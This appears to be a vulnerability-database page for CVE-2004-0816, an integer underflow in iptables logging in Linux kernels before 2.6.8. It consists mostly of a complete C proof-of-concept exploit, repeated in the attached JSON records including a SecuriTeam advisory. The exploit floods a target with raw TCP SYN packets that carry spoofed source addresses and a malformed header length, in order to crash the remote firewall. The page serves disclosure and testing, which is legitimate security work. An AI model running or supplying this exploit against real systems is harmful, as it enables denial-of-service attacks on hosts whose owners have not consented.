Search...

Linux Kernel 2.6.x Firewall Logging Rules Remote DoS Exploit

2008-07-07T00:00:00

ID SSV:8943
Type seebug
Reporter Root
Modified 2008-07-07T00:00:00

Description

No description provided by source.

                                        
                                            
                                                /*&nbsp;
*&nbsp;
*&nbsp;iptables.log.integer.underflow.POC.c&nbsp;
*&nbsp;
*&nbsp;(CAN-2004-0816,&nbsp;BID11488,&nbsp;SUSE-SA:2004:037)
*
*&nbsp;felix__zhou&nbsp;_at_&nbsp;hotmail&nbsp;_dot_&nbsp;com
*
*&nbsp;*/

#include&nbsp;&lt;stdio.h&gt;
#include&nbsp;&lt;winsock2.h&gt;
#include&nbsp;&lt;ws2tcpip.h&gt;
#include&nbsp;&lt;time.h&gt;

#pragma&nbsp;comment(lib,&quot;ws2_32&quot;)

static&nbsp;unsigned&nbsp;char&nbsp;dip[4];
static&nbsp;unsigned&nbsp;int&nbsp;da;
static&nbsp;unsigned&nbsp;short&nbsp;dp;
static&nbsp;unsigned&nbsp;char&nbsp;dport[2];

static&nbsp;unsigned&nbsp;char&nbsp;sip[4];
static&nbsp;unsigned&nbsp;int&nbsp;sa;
static&nbsp;unsigned&nbsp;short&nbsp;sp;
static&nbsp;unsigned&nbsp;char&nbsp;sport[2];

/*
static&nbsp;void&nbsp;ip_csum(unsigned&nbsp;char&nbsp;*ip,&nbsp;unsigned&nbsp;int&nbsp;size,&nbsp;unsigned&nbsp;char&nbsp;*sum)
{
unsigned&nbsp;int&nbsp;csum&nbsp;=&nbsp;0;
unsigned&nbsp;char&nbsp;*p&nbsp;=&nbsp;ip;

while&nbsp;(1&nbsp;&lt;&nbsp;size)&nbsp;{
csum&nbsp;+=&nbsp;(p[0]&nbsp;&lt;&lt;&nbsp;8)&nbsp;+&nbsp;p[1];
p&nbsp;+=&nbsp;2;
size&nbsp;-=&nbsp;2;
}

if&nbsp;(size)&nbsp;
csum&nbsp;+=&nbsp;*p;

csum&nbsp;=&nbsp;(csum&nbsp;&gt;&gt;&nbsp;16)&nbsp;+&nbsp;(csum&nbsp;&amp;&nbsp;0xffff);
csum&nbsp;+=&nbsp;(csum&nbsp;&gt;&gt;&nbsp;16);

sum[0]&nbsp;=&nbsp;(((unsigned&nbsp;short)(~csum))&nbsp;&gt;&gt;&nbsp;8);
sum[1]&nbsp;=&nbsp;((((unsigned&nbsp;short)(~csum))&nbsp;&lt;&lt;&nbsp;8)&nbsp;&gt;&gt;&nbsp;8);
}
*/

static&nbsp;void&nbsp;tcp_csum(unsigned&nbsp;char&nbsp;*tcp,&nbsp;unsigned&nbsp;char&nbsp;*ip,&nbsp;
unsigned&nbsp;int&nbsp;size,&nbsp;unsigned&nbsp;char&nbsp;*sum)
{
unsigned&nbsp;int&nbsp;csum&nbsp;=&nbsp;0;
unsigned&nbsp;char&nbsp;*p&nbsp;=&nbsp;tcp;

while&nbsp;(1&nbsp;&lt;&nbsp;size)&nbsp;{
csum&nbsp;+=&nbsp;(p[0]&nbsp;&lt;&lt;&nbsp;8)&nbsp;+&nbsp;p[1];
p&nbsp;+=&nbsp;2;
size&nbsp;-=&nbsp;2;
}

csum&nbsp;+=&nbsp;(ip[12]&nbsp;&lt;&lt;&nbsp;8)&nbsp;+&nbsp;ip[13];
csum&nbsp;+=&nbsp;(ip[14]&nbsp;&lt;&lt;&nbsp;8)&nbsp;+&nbsp;ip[15];

csum&nbsp;+=&nbsp;(ip[16]&nbsp;&lt;&lt;&nbsp;8)&nbsp;+&nbsp;ip[17];
csum&nbsp;+=&nbsp;(ip[18]&nbsp;&lt;&lt;&nbsp;8)&nbsp;+&nbsp;ip[19];

csum&nbsp;+=&nbsp;0x06;
csum&nbsp;+=&nbsp;0x14;

if&nbsp;(size)&nbsp;
csum&nbsp;+=&nbsp;*p;

csum&nbsp;=&nbsp;(csum&nbsp;&gt;&gt;&nbsp;16)&nbsp;+&nbsp;(csum&nbsp;&amp;&nbsp;0xffff);
csum&nbsp;+=&nbsp;(csum&nbsp;&gt;&gt;&nbsp;16);

sum[0]&nbsp;=&nbsp;(((unsigned&nbsp;short)(~csum))&nbsp;&gt;&gt;&nbsp;8);
sum[1]&nbsp;=&nbsp;((((unsigned&nbsp;short)(~csum))&nbsp;&lt;&lt;&nbsp;8)&nbsp;&gt;&gt;&nbsp;8);
}

static&nbsp;int&nbsp;work(SOCKET&nbsp;s)
{
DWORD&nbsp;ret&nbsp;=&nbsp;1;
unsigned&nbsp;char&nbsp;buf[1500];
unsigned&nbsp;char&nbsp;*ip;
unsigned&nbsp;char&nbsp;*tcp;
unsigned&nbsp;int&nbsp;seq&nbsp;=&nbsp;0x01;
struct&nbsp;sockaddr_in&nbsp;host;

ZeroMemory(buf,&nbsp;1500);

ip&nbsp;=&nbsp;buf;
tcp&nbsp;=&nbsp;buf&nbsp;+&nbsp;20;

ip[0]&nbsp;=&nbsp;0x45;&nbsp;/*&nbsp;ver&nbsp;&amp;&nbsp;hlen&nbsp;*/
ip[3]&nbsp;=&nbsp;0x28;&nbsp;/*&nbsp;tlen&nbsp;*/
ip[8]&nbsp;=&nbsp;0x80;&nbsp;/*&nbsp;ttl&nbsp;*/
ip[9]&nbsp;=&nbsp;0x06;&nbsp;/*&nbsp;protocol&nbsp;*/
ip[10]&nbsp;=&nbsp;ip[11]&nbsp;=&nbsp;0;
ip[12]&nbsp;=&nbsp;sip[0];&nbsp;/*&nbsp;saddr&nbsp;*/
ip[13]&nbsp;=&nbsp;sip[1];
ip[14]&nbsp;=&nbsp;sip[2];
ip[15]&nbsp;=&nbsp;sip[3];
ip[16]&nbsp;=&nbsp;dip[0];&nbsp;/*&nbsp;daddr&nbsp;*/
ip[17]&nbsp;=&nbsp;dip[1];
ip[18]&nbsp;=&nbsp;dip[2];
ip[19]&nbsp;=&nbsp;dip[3];

tcp[0]&nbsp;=&nbsp;sport[0];
tcp[1]&nbsp;=&nbsp;sport[1];
tcp[2]&nbsp;=&nbsp;dport[0];&nbsp;/*&nbsp;dport&nbsp;*/
tcp[3]&nbsp;=&nbsp;dport[1];
tcp[12]&nbsp;=&nbsp;0x40;&nbsp;/*&nbsp;hlen&nbsp;*/&nbsp;/*&nbsp;HERE&nbsp;*/
tcp[13]&nbsp;=&nbsp;0x02;&nbsp;/*&nbsp;flags&nbsp;*/

ZeroMemory(&amp;host,&nbsp;sizeof(struct&nbsp;sockaddr_in));
host.sin_family&nbsp;=&nbsp;AF_INET;
host.sin_port&nbsp;=&nbsp;dp;
host.sin_addr.s_addr&nbsp;=&nbsp;da;

for&nbsp;(;;&nbsp;)&nbsp;{
tcp[4]&nbsp;=&nbsp;(seq&nbsp;&gt;&gt;&nbsp;24);&nbsp;/*&nbsp;seq&nbsp;number&nbsp;*/
tcp[5]&nbsp;=&nbsp;((seq&nbsp;&lt;&lt;&nbsp;8)&nbsp;&gt;&gt;&nbsp;24);
tcp[6]&nbsp;=&nbsp;((seq&nbsp;&lt;&lt;&nbsp;16)&nbsp;&gt;&gt;&nbsp;24);
tcp[7]&nbsp;=&nbsp;((seq&nbsp;&lt;&lt;&nbsp;24)&nbsp;&gt;&gt;&nbsp;24);
tcp[16]&nbsp;=&nbsp;tcp[17]&nbsp;=&nbsp;0;
seq&nbsp;++;

tcp_csum(tcp,&nbsp;ip,&nbsp;0x14,&nbsp;tcp&nbsp;+&nbsp;16);

if&nbsp;(SOCKET_ERROR&nbsp;==&nbsp;sendto(s,&nbsp;buf,&nbsp;0x28,&nbsp;0,&nbsp;
(SOCKADDR&nbsp;*)&amp;(host),&nbsp;sizeof&nbsp;host))&nbsp;{
if&nbsp;(WSAEACCES&nbsp;!=&nbsp;WSAGetLastError())&nbsp;{
printf(&quot;sendto()&nbsp;failed:&nbsp;%d\n&quot;,&nbsp;
WSAGetLastError());

ret&nbsp;=&nbsp;1;
}&nbsp;else&nbsp;{
printf(&quot;You&nbsp;must&nbsp;be&nbsp;Administrator!\n&quot;);
}

break;
}
}

return&nbsp;ret;
}

static&nbsp;char&nbsp;usage[]&nbsp;=&nbsp;&quot;Usage:&nbsp;%s&nbsp;dip&nbsp;dport&nbsp;sip&nbsp;sport\n&quot;;

int&nbsp;main(int&nbsp;argc,&nbsp;char&nbsp;**argv)
{
WORD&nbsp;ver&nbsp;=&nbsp;MAKEWORD(2,&nbsp;2);
WSADATA&nbsp;data;
unsigned&nbsp;char&nbsp;*p;
SOCKET&nbsp;s;
int&nbsp;ret&nbsp;=&nbsp;1;
BOOL&nbsp;eopt&nbsp;=&nbsp;TRUE;

if&nbsp;(5&nbsp;!=&nbsp;argc)&nbsp;{
printf(usage,&nbsp;argv[0]);
goto&nbsp;out;
}

if&nbsp;(INADDR_NONE&nbsp;==&nbsp;(da&nbsp;=&nbsp;inet_addr(argv[1])))&nbsp;{
printf(&quot;dest&nbsp;ip&nbsp;address&nbsp;is&nbsp;NOT&nbsp;valid!\n&quot;);
printf(usage,&nbsp;argv[0]);
goto&nbsp;out;
}

p&nbsp;=&nbsp;(unsigned&nbsp;char&nbsp;*)&amp;da;
dip[0]&nbsp;=&nbsp;p[0];
dip[1]&nbsp;=&nbsp;p[1];
dip[2]&nbsp;=&nbsp;p[2];
dip[3]&nbsp;=&nbsp;p[3];

dp&nbsp;=&nbsp;atoi(argv[2]);
dport[0]&nbsp;=&nbsp;((dp&nbsp;&lt;&lt;&nbsp;16)&nbsp;&gt;&gt;&nbsp;24);
dport[1]&nbsp;=&nbsp;((dp&nbsp;&lt;&lt;&nbsp;24)&nbsp;&gt;&gt;&nbsp;24);

if&nbsp;(INADDR_NONE&nbsp;==&nbsp;(sa&nbsp;=&nbsp;inet_addr(argv[3])))&nbsp;{
printf(&quot;source&nbsp;ip&nbsp;address&nbsp;is&nbsp;NOT&nbsp;valid!\n&quot;);
printf(usage,&nbsp;argv[3]);
goto&nbsp;out;
}

p&nbsp;=&nbsp;(unsigned&nbsp;char&nbsp;*)&amp;sa;
sip[0]&nbsp;=&nbsp;p[0];
sip[1]&nbsp;=&nbsp;p[1];
sip[2]&nbsp;=&nbsp;p[2];
sip[3]&nbsp;=&nbsp;p[3];

sp&nbsp;=&nbsp;atoi(argv[4]);
sport[0]&nbsp;=&nbsp;((sp&nbsp;&lt;&lt;&nbsp;16)&nbsp;&gt;&gt;&nbsp;24);
sport[1]&nbsp;=&nbsp;((sp&nbsp;&lt;&lt;&nbsp;24)&nbsp;&gt;&gt;&nbsp;24);

srand((unsigned&nbsp;int)time(0));

if&nbsp;(WSAStartup(ver,&nbsp;&amp;data))&nbsp;{
printf(&quot;WSAStartup()&nbsp;failed\n&quot;);
goto&nbsp;out;
}

if&nbsp;(INVALID_SOCKET&nbsp;==&nbsp;(s&nbsp;=&nbsp;WSASocket(AF_INET,&nbsp;SOCK_RAW,&nbsp;IPPROTO_RAW,&nbsp;0,&nbsp;0,&nbsp;0)))&nbsp;
goto&nbsp;err;

if&nbsp;(SOCKET_ERROR&nbsp;==&nbsp;setsockopt(s,&nbsp;IPPROTO_IP,&nbsp;IP_HDRINCL,&nbsp;
(char&nbsp;*)&amp;eopt,&nbsp;sizeof(eopt)))
goto&nbsp;err1;

work(s);

err1:
closesocket(s);
err:
WSACleanup();

out:
return&nbsp;ret;
}

JSON Vulners Source

Initial Source

{"href": "https://www.seebug.org/vuldb/ssvid-8943", "status": "poc", "history": [], "bulletinFamily": "exploit", "modified": "2008-07-07T00:00:00", "title": "Linux Kernel 2.6.x Firewall Logging Rules Remote DoS Exploit", "cvss": {"vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/", "score": 5.0}, "sourceHref": "https://www.seebug.org/vuldb/ssvid-8943", "cvelist": ["CVE-2004-0816"], "description": "No description provided by source.", "viewCount": 2, "published": "2008-07-07T00:00:00", "sourceData": "\n /* \r\n* \r\n* iptables.log.integer.underflow.POC.c \r\n* \r\n* (CAN-2004-0816, BID11488, SUSE-SA:2004:037)\r\n*\r\n* felix__zhou _at_ hotmail _dot_ com\r\n*\r\n* */\r\n\r\n#include <stdio.h>\r\n#include <winsock2.h>\r\n#include <ws2tcpip.h>\r\n#include <time.h>\r\n\r\n#pragma comment(lib,"ws2_32")\r\n\r\nstatic unsigned char dip[4];\r\nstatic unsigned int da;\r\nstatic unsigned short dp;\r\nstatic unsigned char dport[2];\r\n\r\nstatic unsigned char sip[4];\r\nstatic unsigned int sa;\r\nstatic unsigned short sp;\r\nstatic unsigned char sport[2];\r\n\r\n/*\r\nstatic void ip_csum(unsigned char *ip, unsigned int size, unsigned char *sum)\r\n{\r\nunsigned int csum = 0;\r\nunsigned char *p = ip;\r\n\r\nwhile (1 < size) {\r\ncsum += (p[0] << 8) + p[1];\r\np += 2;\r\nsize -= 2;\r\n}\r\n\r\nif (size) \r\ncsum += *p;\r\n\r\ncsum = (csum >> 16) + (csum & 0xffff);\r\ncsum += (csum >> 16);\r\n\r\nsum[0] = (((unsigned short)(~csum)) >> 8);\r\nsum[1] = ((((unsigned short)(~csum)) << 8) >> 8);\r\n}\r\n*/\r\n\r\nstatic void tcp_csum(unsigned char *tcp, unsigned char *ip, \r\nunsigned int size, unsigned char *sum)\r\n{\r\nunsigned int csum = 0;\r\nunsigned char *p = tcp;\r\n\r\nwhile (1 < size) {\r\ncsum += (p[0] << 8) + p[1];\r\np += 2;\r\nsize -= 2;\r\n}\r\n\r\ncsum += (ip[12] << 8) + ip[13];\r\ncsum += (ip[14] << 8) + ip[15];\r\n\r\ncsum += (ip[16] << 8) + ip[17];\r\ncsum += (ip[18] << 8) + ip[19];\r\n\r\ncsum += 0x06;\r\ncsum += 0x14;\r\n\r\nif (size) \r\ncsum += *p;\r\n\r\ncsum = (csum >> 16) + (csum & 0xffff);\r\ncsum += (csum >> 16);\r\n\r\nsum[0] = (((unsigned short)(~csum)) >> 8);\r\nsum[1] = ((((unsigned short)(~csum)) << 8) >> 8);\r\n}\r\n\r\nstatic int work(SOCKET s)\r\n{\r\nDWORD ret = 1;\r\nunsigned char buf[1500];\r\nunsigned char *ip;\r\nunsigned char *tcp;\r\nunsigned int seq = 0x01;\r\nstruct sockaddr_in host;\r\n\r\nZeroMemory(buf, 1500);\r\n\r\nip = buf;\r\ntcp = buf + 20;\r\n\r\nip[0] = 0x45; /* ver & hlen */\r\nip[3] = 0x28; /* tlen */\r\nip[8] = 0x80; /* ttl */\r\nip[9] = 0x06; /* protocol */\r\nip[10] = ip[11] = 0;\r\nip[12] = sip[0]; /* saddr */\r\nip[13] = sip[1];\r\nip[14] = sip[2];\r\nip[15] = sip[3];\r\nip[16] = dip[0]; /* daddr */\r\nip[17] = dip[1];\r\nip[18] = dip[2];\r\nip[19] = dip[3];\r\n\r\ntcp[0] = sport[0];\r\ntcp[1] = sport[1];\r\ntcp[2] = dport[0]; /* dport */\r\ntcp[3] = dport[1];\r\ntcp[12] = 0x40; /* hlen */ /* HERE */\r\ntcp[13] = 0x02; /* flags */\r\n\r\nZeroMemory(&host, sizeof(struct sockaddr_in));\r\nhost.sin_family = AF_INET;\r\nhost.sin_port = dp;\r\nhost.sin_addr.s_addr = da;\r\n\r\nfor (;; ) {\r\ntcp[4] = (seq >> 24); /* seq number */\r\ntcp[5] = ((seq << 8) >> 24);\r\ntcp[6] = ((seq << 16) >> 24);\r\ntcp[7] = ((seq << 24) >> 24);\r\ntcp[16] = tcp[17] = 0;\r\nseq ++;\r\n\r\ntcp_csum(tcp, ip, 0x14, tcp + 16);\r\n\r\nif (SOCKET_ERROR == sendto(s, buf, 0x28, 0, \r\n(SOCKADDR *)&(host), sizeof host)) {\r\nif (WSAEACCES != WSAGetLastError()) {\r\nprintf("sendto() failed: %d\\n", \r\nWSAGetLastError());\r\n\r\nret = 1;\r\n} else {\r\nprintf("You must be Administrator!\\n");\r\n}\r\n\r\nbreak;\r\n}\r\n}\r\n\r\nreturn ret;\r\n}\r\n\r\nstatic char usage[] = "Usage: %s dip dport sip sport\\n";\r\n\r\nint main(int argc, char **argv)\r\n{\r\nWORD ver = MAKEWORD(2, 2);\r\nWSADATA data;\r\nunsigned char *p;\r\nSOCKET s;\r\nint ret = 1;\r\nBOOL eopt = TRUE;\r\n\r\nif (5 != argc) {\r\nprintf(usage, argv[0]);\r\ngoto out;\r\n}\r\n\r\nif (INADDR_NONE == (da = inet_addr(argv[1]))) {\r\nprintf("dest ip address is NOT valid!\\n");\r\nprintf(usage, argv[0]);\r\ngoto out;\r\n}\r\n\r\np = (unsigned char *)&da;\r\ndip[0] = p[0];\r\ndip[1] = p[1];\r\ndip[2] = p[2];\r\ndip[3] = p[3];\r\n\r\ndp = atoi(argv[2]);\r\ndport[0] = ((dp << 16) >> 24);\r\ndport[1] = ((dp << 24) >> 24);\r\n\r\nif (INADDR_NONE == (sa = inet_addr(argv[3]))) {\r\nprintf("source ip address is NOT valid!\\n");\r\nprintf(usage, argv[3]);\r\ngoto out;\r\n}\r\n\r\np = (unsigned char *)&sa;\r\nsip[0] = p[0];\r\nsip[1] = p[1];\r\nsip[2] = p[2];\r\nsip[3] = p[3];\r\n\r\nsp = atoi(argv[4]);\r\nsport[0] = ((sp << 16) >> 24);\r\nsport[1] = ((sp << 24) >> 24);\r\n\r\nsrand((unsigned int)time(0));\r\n\r\nif (WSAStartup(ver, &data)) {\r\nprintf("WSAStartup() failed\\n");\r\ngoto out;\r\n}\r\n\r\nif (INVALID_SOCKET == (s = WSASocket(AF_INET, SOCK_RAW, IPPROTO_RAW, 0, 0, 0))) \r\ngoto err;\r\n\r\nif (SOCKET_ERROR == setsockopt(s, IPPROTO_IP, IP_HDRINCL, \r\n(char *)&eopt, sizeof(eopt)))\r\ngoto err1;\r\n\r\nwork(s);\r\n\r\nerr1:\r\nclosesocket(s);\r\nerr:\r\nWSACleanup();\r\n\r\nout:\r\nreturn ret;\r\n}\n ", "id": "SSV:8943", "enchantments_done": [], "_object_type": "robots.models.seebug.SeebugBulletin", "type": "seebug", "lastseen": "2017-11-19T21:36:20", "reporter": "Root", "_object_types": ["robots.models.base.Bulletin", "robots.models.seebug.SeebugBulletin"], "enchantments": {"score": {"value": 7.5, "vector": "NONE"}, "vulnersScore": 7.5}, "objectVersion": "1.4", "references": []}

{"cve": [{"lastseen": "2017-07-11T11:14:29", "references": ["https://exchange.xforce.ibmcloud.com/vulnerabilities/17800", "http://www.mandriva.com/security/advisories?name=MDKSA-2005:022", "http://www.securityfocus.com/bid/11488", "http://www.novell.com/linux/security/advisories/2004_37_kernel.html"], "description": "Integer underflow in the firewall logging rules for iptables in Linux before 2.6.8 allows remote attackers to cause a denial of service (application crash) via a malformed IP packet.", "edition": 2, "reporter": "NVD", "published": "2004-12-23T00:00:00", "title": "CVE-2004-0816", "type": "cve", "enchantments": {"score": {"modified": "2017-07-11T11:14:29", "vector": "NONE", "value": 5.0}}, "assessment": {"system": "", "name": "", "href": ""}, "bulletinFamily": "NVD", "cvelist": ["CVE-2004-0816"], "scanner": [], "modified": "2017-07-10T21:30:30", "cpe": ["cpe:/o:linux:linux_kernel:2.6.6:rc1", "cpe:/o:linux:linux_kernel:2.6.4", "cpe:/o:linux:linux_kernel:2.6.0:test4", "cpe:/o:linux:linux_kernel:2.6.1", "cpe:/o:linux:linux_kernel:2.6.0:test1", "cpe:/o:linux:linux_kernel:2.6.1:rc1", "cpe:/o:linux:linux_kernel:2.6.1:rc2", "cpe:/o:suse:suse_linux:9.1", "cpe:/o:linux:linux_kernel:2.6.8:rc1", "cpe:/o:linux:linux_kernel:2.6.3", "cpe:/o:linux:linux_kernel:2.6.6", "cpe:/o:linux:linux_kernel:2.6.8:rc3", "cpe:/o:linux:linux_kernel:2.6.5", "cpe:/o:linux:linux_kernel:2.6.0", "cpe:/o:linux:linux_kernel:2.6.2", "cpe:/o:linux:linux_kernel:2.6.0:test2", "cpe:/o:linux:linux_kernel:2.6.0:test7", "cpe:/o:linux:linux_kernel:2.6.0:test8", "cpe:/o:linux:linux_kernel:2.6.0:test10", "cpe:/o:linux:linux_kernel:2.6.0:test11", "cpe:/o:linux:linux_kernel:2.6.0:test6", "cpe:/o:linux:linux_kernel:2.6.0:test9", "cpe:/o:linux:linux_kernel:2.6.0:test3", "cpe:/o:linux:linux_kernel:2.6.0:test5", "cpe:/o:linux:linux_kernel:2.6.7", "cpe:/o:linux:linux_kernel:2.6.8:rc2", "cpe:/o:linux:linux_kernel:2.6_test9_cvs", "cpe:/o:linux:linux_kernel:2.6.7:rc1"], "id": "CVE-2004-0816", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2004-0816", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}], "securityvulns": [{"lastseen": "2018-08-31T11:10:11", "references": [], "description": "The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site:\r\nhttp://www.securiteam.com\r\n- - promotion\r\n\r\nThe SecuriTeam alerts list - Free, Accurate, Independent.\r\n\r\nGet your security news from a reliable source.\r\nhttp://www.securiteam.com/mailinglist.html \r\n\r\n- - - - - - - - -\r\n\r\n\r\n\r\n IPTables Log Integer Underflow (PoC)\r\n------------------------------------------------------------------------\r\n\r\n\r\nSUMMARY\r\n\r\nAn integer underflow in the firewall logging rules for iptables in Linux \r\nbefore version 2.6.8 allows remote attackers to cause a denial of service \r\n(application crash) via a malformed IP packet. The attached exploit code \r\ncan be used to test your system for the mentioned vulnerability.\r\n\r\nDETAILS\r\n\r\nVulnerable Systems:\r\n * Linux Kernel version 2.6.7 and prior\r\n\r\nImmune Systems:\r\n * Linux Kernel version 2.6.8 or newer\r\n\r\nCVE Information:\r\n <http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2004-0816> \r\nCAN-2004-0816\r\n\r\nExploit:\r\n/*\r\n*\r\n* iptables.log.integer.underflow.POC.c\r\n*\r\n* (CAN-2004-0816, SUSE-SA:2004:037, SECU)\r\n*\r\n* felix__zhou _at_ hotmail _dot_ com\r\n*\r\n* */\r\n\r\n#include <stdio.h>\r\n#include <winsock2.h>\r\n#include <ws2tcpip.h>\r\n#include <time.h>\r\n\r\n#pragma comment(lib,"ws2_32")\r\n\r\nstatic unsigned char dip[4];\r\nstatic unsigned int da;\r\nstatic unsigned short dp;\r\nstatic unsigned char dport[2];\r\n\r\nstatic unsigned char sip[4];\r\nstatic unsigned int sa;\r\nstatic unsigned short sp;\r\nstatic unsigned char sport[2];\r\n\r\n/*\r\nstatic void ip_csum(unsigned char *ip, unsigned int size, unsigned char \r\n*sum)\r\n{\r\nunsigned int csum = 0;\r\nunsigned char *p = ip;\r\n\r\nwhile (1 < size) {\r\ncsum += (p[0] << 8) + p[1];\r\np += 2;\r\nsize -= 2;\r\n}\r\n\r\nif (size)\r\ncsum += *p;\r\n\r\ncsum = (csum >> 16) + (csum & 0xffff);\r\ncsum += (csum >> 16);\r\n\r\nsum[0] = (((unsigned short)(~csum)) >> 8);\r\nsum[1] = ((((unsigned short)(~csum)) << 8) >> 8);\r\n}\r\n*/\r\n\r\nstatic void tcp_csum(unsigned char *tcp, unsigned char *ip,\r\nunsigned int size, unsigned char *sum)\r\n{\r\nunsigned int csum = 0;\r\nunsigned char *p = tcp;\r\n\r\nwhile (1 < size) {\r\ncsum += (p[0] << 8) + p[1];\r\np += 2;\r\nsize -= 2;\r\n}\r\n\r\ncsum += (ip[12] << 8) + ip[13];\r\ncsum += (ip[14] << 8) + ip[15];\r\n\r\ncsum += (ip[16] << 8) + ip[17];\r\ncsum += (ip[18] << 8) + ip[19];\r\n\r\ncsum += 0x06;\r\ncsum += 0x14;\r\n\r\nif (size)\r\ncsum += *p;\r\n\r\ncsum = (csum >> 16) + (csum & 0xffff);\r\ncsum += (csum >> 16);\r\n\r\nsum[0] = (((unsigned short)(~csum)) >> 8);\r\nsum[1] = ((((unsigned short)(~csum)) << 8) >> 8);\r\n}\r\n\r\nstatic int work(SOCKET s)\r\n{\r\nDWORD ret = 1;\r\nunsigned char buf[1500];\r\nunsigned char *ip;\r\nunsigned char *tcp;\r\nunsigned int seq = 0x01;\r\nstruct sockaddr_in host;\r\n\r\nZeroMemory(buf, 1500);\r\n\r\nip = buf;\r\ntcp = buf + 20;\r\n\r\nip[0] = 0x45; /* ver & hlen */\r\nip[3] = 0x28; /* tlen */\r\nip[8] = 0x80; /* ttl */\r\nip[9] = 0x06; /* protocol */\r\nip[10] = ip[11] = 0;\r\nip[12] = sip[0]; /* saddr */\r\nip[13] = sip[1];\r\nip[14] = sip[2];\r\nip[15] = sip[3];\r\nip[16] = dip[0]; /* daddr */\r\nip[17] = dip[1];\r\nip[18] = dip[2];\r\nip[19] = dip[3];\r\n\r\ntcp[0] = sport[0];\r\ntcp[1] = sport[1];\r\ntcp[2] = dport[0]; /* dport */\r\ntcp[3] = dport[1];\r\ntcp[12] = 0x40; /* hlen */ /* HERE */\r\ntcp[13] = 0x02; /* flags */\r\n\r\nZeroMemory(&host, sizeof(struct sockaddr_in));\r\nhost.sin_family = AF_INET;\r\nhost.sin_port = dp;\r\nhost.sin_addr.s_addr = da;\r\n\r\nfor (;; ) {\r\ntcp[4] = (seq >> 24); /* seq number */\r\ntcp[5] = ((seq << 8) >> 24);\r\ntcp[6] = ((seq << 16) >> 24);\r\ntcp[7] = ((seq << 24) >> 24);\r\ntcp[16] = tcp[17] = 0;\r\nseq ++;\r\n\r\ntcp_csum(tcp, ip, 0x14, tcp + 16);\r\n\r\nif (SOCKET_ERROR == sendto(s, buf, 0x28, 0,\r\n(SOCKADDR *)&(host), sizeof host)) {\r\nif (WSAEACCES != WSAGetLastError()) {\r\nprintf("sendto() failed: %d\n",\r\nWSAGetLastError());\r\n\r\nret = 1;\r\n} else {\r\nprintf("You must be Administrator!\n");\r\n}\r\n\r\nbreak;\r\n}\r\n}\r\n\r\nreturn ret;\r\n}\r\n\r\nstatic char usage[] = "Usage: %s dip dport sip sport\n";\r\n\r\nint main(int argc, char **argv)\r\n{\r\nWORD ver = MAKEWORD(2, 2);\r\nWSADATA data;\r\nunsigned char *p;\r\nSOCKET s;\r\nint ret = 1;\r\nBOOL eopt = TRUE;\r\n\r\nif (5 != argc) {\r\nprintf(usage, argv[0]);\r\ngoto out;\r\n}\r\n\r\nif (INADDR_NONE == (da = inet_addr(argv[1]))) {\r\nprintf("dest ip address is NOT valid!\n");\r\nprintf(usage, argv[0]);\r\ngoto out;\r\n}\r\n\r\np = (unsigned char *)&da;\r\ndip[0] = p[0];\r\ndip[1] = p[1];\r\ndip[2] = p[2];\r\ndip[3] = p[3];\r\n\r\ndp = atoi(argv[2]);\r\ndport[0] = ((dp << 16) >> 24);\r\ndport[1] = ((dp << 24) >> 24);\r\n\r\nif (INADDR_NONE == (sa = inet_addr(argv[3]))) {\r\nprintf("source ip address is NOT valid!\n");\r\nprintf(usage, argv[3]);\r\ngoto out;\r\n}\r\n\r\np = (unsigned char *)&sa;\r\nsip[0] = p[0];\r\nsip[1] = p[1];\r\nsip[2] = p[2];\r\nsip[3] = p[3];\r\n\r\nsp = atoi(argv[4]);\r\nsport[0] = ((sp << 16) >> 24);\r\nsport[1] = ((sp << 24) >> 24);\r\n\r\nsrand((unsigned int)time(0));\r\n\r\nif (WSAStartup(ver, &data)) {\r\nprintf("WSAStartup() failed\n");\r\ngoto out;\r\n}\r\n\r\nif (INVALID_SOCKET == (s = WSASocket(AF_INET, SOCK_RAW, IPPROTO_RAW, 0, 0, \r\n0)))\r\ngoto err;\r\n\r\nif (SOCKET_ERROR == setsockopt(s, IPPROTO_IP, IP_HDRINCL,\r\n(char *)&eopt, sizeof(eopt)))\r\ngoto err1;\r\n\r\nwork(s);\r\n\r\nerr1:\r\nclosesocket(s);\r\nerr:\r\nWSACleanup();\r\n\r\nout:\r\nreturn ret;\r\n}\r\n\r\n\r\nADDITIONAL INFORMATION\r\n\r\nThe information has been provided by felix zhou.\r\n\r\n\r\n\r\n======================================== \r\n\r\n\r\nThis bulletin is sent to members of the SecuriTeam mailing list. \r\nTo unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com \r\nIn order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com \r\n\r\n\r\n==================== \r\n==================== \r\n\r\nDISCLAIMER: \r\nThe information in this bulletin is provided "AS IS" without warranty of any kind. \r\nIn no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business\r\nprofits or special damages. \r\n\r\n\r\n\r\n", "edition": 1, "reporter": "Securityvulns", "published": "2004-11-01T00:00:00", "title": "[UNIX] IPTables Log Integer Underflow (PoC)", "type": "securityvulns", "enchantments": {"score": {"modified": "2018-08-31T11:10:11", "vector": "NONE", "value": 5.0}}, "bulletinFamily": "software", "affectedSoftware": [], "cvelist": ["CVE-2004-0816"], "modified": "2004-11-01T00:00:00", "id": "SECURITYVULNS:DOC:7115", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:7115", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}], "seebug": [{"lastseen": "2017-11-19T14:12:50", "_object_types": ["robots.models.base.Bulletin", "robots.models.seebug.SeebugBulletin"], "enchantments_done": [], "references": [], "description": "No description provided by source.", "reporter": "Root", "published": "2014-07-01T00:00:00", "title": "Linux Kernel 2.6.x IPTables Logging Rules Integer Underflow Vulnerability", "type": "seebug", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "bulletinFamily": "exploit", "cvelist": ["CVE-2004-0816"], "_object_type": "robots.models.seebug.SeebugBulletin", "modified": "2014-07-01T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-78390", "id": "SSV:78390", "sourceData": "\n source: http://www.securityfocus.com/bid/11488/info\r\n\r\nIt is reported that an integer underflow 